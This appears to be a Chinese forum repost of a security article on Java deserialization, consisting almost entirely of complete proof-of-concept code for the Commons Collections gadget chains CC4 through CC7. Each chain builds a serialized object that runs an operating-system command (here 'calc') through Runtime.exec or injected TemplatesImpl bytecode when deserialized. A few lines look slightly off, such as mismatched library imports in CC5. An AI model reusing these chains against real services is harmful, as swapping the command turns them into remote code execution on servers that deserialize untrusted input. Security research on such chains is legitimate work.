|
|
本帖最后由 margin 于 2022-3-14 22:34 编辑
原文链接:Java安全之Commons Collections4-7分析 (qq.com)
CC4分析i- import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
- import javassist.*;
- import org.apache.commons.collections4.Transformer;
- import org.apache.commons.collections4.comparators.TransformingComparator;
- import org.apache.commons.collections4.functors.ChainedTransformer;
- import org.apache.commons.collections4.functors.ConstantTransformer;
- import org.apache.commons.collections4.functors.InstantiateTransformer;
- import javax.xml.transform.Templates;
- import java.io.*;
- import java.lang.reflect.Field;
- import java.lang.reflect.InvocationTargetException;
- import java.util.PriorityQueue;
- public class cc4 {
- public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
- //使用字节码创建恶意类
- String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
- ClassPool classPool=ClassPool.getDefault();
- classPool.appendClassPath(AbstractTranslet);
- CtClass payload=classPool.makeClass("cc4Demo");
- payload.setSuperclass(classPool.get(AbstractTranslet));
- payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec("calc");");
- byte[] bytes = payload.toBytecode();
- //反射调用TemplatesImpl
- String TemplatesImpl="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
- Object templates = Class.forName(TemplatesImpl).getDeclaredConstructor(new Class[]{}).newInstance();
- //设置_bytecodes属性,将二进的恶意类添加到_bytecodes
- Field field=templates.getClass().getDeclaredField("_bytecodes");
- field.setAccessible(true);
- field.set(templates,new byte[][]{bytes});
- //设置_name属性
- Field name=templates.getClass().getDeclaredField("_name");
- name.setAccessible(true);
- name.set(templates,"test");
- //生成tramsformer
- Transformer[] trans = new Transformer[]{
- new ConstantTransformer(TrAXFilter.class),
- new InstantiateTransformer(
- new Class[]{Templates.class},
- new Object[]{templates})
- };
- //生成ChainedTransformer
- ChainedTransformer chian = new ChainedTransformer(trans);
- TransformingComparator transCom = new TransformingComparator(chian);
- //生成PriorityQueue
- PriorityQueue queue = new PriorityQueue(2);
- queue.add(1);
- queue.add(1);
- Field com = PriorityQueue.class.getDeclaredField("comparator");
- com.setAccessible(true);
- com.set(queue,transCom);
- ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
- outputStream.writeObject(queue);
- outputStream.close();
- ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));
- inputStream.readObject();
- }
- }
 
CC5分析
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.map.LazyMap;
- import org.apache.commons.collections4.keyvalue.TiedMapEntry;
- import javax.management.BadAttributeValueExpException;
- import java.io.FileInputStream;
- import java.io.FileOutputStream;
- import java.io.ObjectInputStream;
- import java.io.ObjectOutputStream;
- import java.lang.reflect.Field;
- import java.util.HashMap;
- public class cc5 {
- public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
- ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod", new Class[] {
- String.class, Class[].class }, new Object[] {
- "getRuntime", new Class[0] }),
- new InvokerTransformer("invoke", new Class[] {
- Object.class, Object[].class }, new Object[] {
- null, new Object[0] }),
- new InvokerTransformer("exec",
- new Class[] { String.class }, new Object[]{"calc"})});
- HashMap innermap = new HashMap();
- LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);
- TiedMapEntry tiedmap = new TiedMapEntry(map,123);
- BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
- Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
- val.setAccessible(true);
- val.set(poc,tiedmap);
- ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
- outputStream.writeObject(poc);
- outputStream.close();
- ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("test.out"));
- inputStream.readObject();
- }
- }
CC6分析
- import org.apache.commons.collections.*;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.keyvalue.TiedMapEntry;
- import org.apache.commons.collections.map.LazyMap;
- import java.io.*;
- import java.util.HashMap;
- import java.util.HashSet;
- import java.util.Map;
- public class cc6 {
- public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
- Transformer[] transformers=new Transformer[]{
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),
- new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),
- new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
- };
- ChainedTransformer Testtransformer = new ChainedTransformer(transformers);
- //创建一个hashmap
- Map map=new HashMap();
- Map lazyMap=LazyMap.decorate(map,Testtransformer);
- TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test1");
- HashSet hashSet=new HashSet(1);
- hashSet.add(tiedMapEntry);
- lazyMap.remove("test1");
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
- objectOutputStream.writeObject(hashSet);
- objectOutputStream.close();
- ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test.out"));
- objectInputStream.readObject();
- }
- }
CC7分析
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.map.LazyMap;
- import java.io.*;
- import java.util.HashMap;
- import java.util.Hashtable;
- import java.util.Map;
- public class cc7 {
- public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
- Transformer[] transformers=new Transformer[]{
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),
- new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),
- new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
- };
- ChainedTransformer Testtransformer = new ChainedTransformer(transformers);
- Map innerMap1 = new HashMap();
- Map innerMap2 = new HashMap();
- Map lazyMap1 = LazyMap.decorate(innerMap1, Testtransformer);
- lazyMap1.put("yy", 1);
- Map lazyMap2 = LazyMap.decorate(innerMap2, Testtransformer);
- lazyMap2.put("zZ", 1);
- Hashtable hashtable = new Hashtable();
- hashtable.put(lazyMap1, 1);
- hashtable.put(lazyMap2, 2);
- lazyMap2.remove("yy");
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
- objectOutputStream.writeObject(hashtable);
- objectOutputStream.close();
- ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test.out"));
- objectInputStream.readObject();
- }
- }
|
|
发表于 2022-3-14 22:32:37